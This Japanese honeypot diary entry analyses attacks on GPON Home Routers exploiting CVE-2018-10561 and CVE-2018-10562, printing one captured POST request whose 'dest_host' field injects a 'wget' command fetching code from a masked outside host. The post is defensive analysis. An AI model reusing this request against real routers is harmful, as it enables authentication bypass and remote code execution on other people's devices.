ハニーポット観測日記「GPON Home Routersの脆弱性を狙った攻撃」

2018年5月3日に,GPON Home Routersの脆弱性(CVE-2018-10561/CVE-2018-10562)が公開されました.私が運用しているWOWHoneypotでもGPON Homeに対する攻撃を観測したので記事にまとめておきます.

ちなみに,現時点(5/12)で観測した攻撃は2018年5月7日に2回,2018年5月8日に1回となっています.先日のDrupalの脆弱性と同様,観測数が少なく確認した攻撃パターンは1パターンのみとなっています.攻撃が少ないことはいいことなのですが,少し寂しいです^^;

脆弱性の概要

GPON Home Routersの脆弱性(CVE-2018-10561/CVE-2018-10562)とは,韓国の企業DASAN Zhone Solutions, Inc.が販売するGPON Home Routersに存在している脆弱性で,2018年5月3日にPoCが公開されました.本脆弱性を悪用した攻撃を受けた場合,第三者によって遠隔から,デバイス上で任意のコマンドを実行されてしまう可能性があります.

  • CVE-2018-10561 : デバイス上のすべての認証を回避可能な脆弱性
  • CVE-2018-10562 : デバイス上で任意のコマンドを実行可能な脆弱性

公開されているPoCはこの2つの脆弱性を組み合わせることで,デバイス上で任意のコマンドを実行しています.今回WOWHoneypotで観測した攻撃もPoCと同様に,この2つの脆弱性を組み合わせたものと考えられます.

観測したWOWHoneypotのログ

実際に観測したWOWHoneypotに対するリクエスト内容を以下に示します.

POST /GponForm/diag_Form?images/ HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: ***.***.***.***:80
Content-Type: text/plain
Content-length: 119

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://***.***.***.***/gpon.php?port=80&ipv=0

※一部情報を伏せています.

このリクエスト内容で重要な部分は,?images/pingwget;wget -qO - http://***.***.***.***/gpon.php?port=80です.PoCによるとGPON Home Routersの管理ページに?image/を付加してアクセスすることで,認証を回避することが可能なようです.またアクセスした際にpingの結果をtmpに保存してユーザに送信する機能を利用することで,任意のコマンドを実行することが可能なようです.

このリクエスト内容の場合,$ wget;wget -qO - http://***.***.***.***/gpon.php?port=80が実行されると考えられます.

アクセス先については,ログ分析時にはすでに応答がなかったため,どのようなファイルだったのかはわかりませんでした.

おわりに

今回の脆弱性の影響を受ける機器はすでにサポートが終了しており,あまり利用されていないようですが,もし使用している場合は使用を中止するのが良さそうです.

最近,Web特化型ハニーポットのログ分析に徐々に慣れてきたので,ログ分析が非常に楽しく感じています.今後はさらにログ分析だけでなく,自分でバリバリシグネチャを書けるようにになりたいです^^

参考文献

https://nvd.nist.gov/vuln/detail/CVE-2018-10561
https://nvd.nist.gov/vuln/detail/CVE-2018-10562
https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/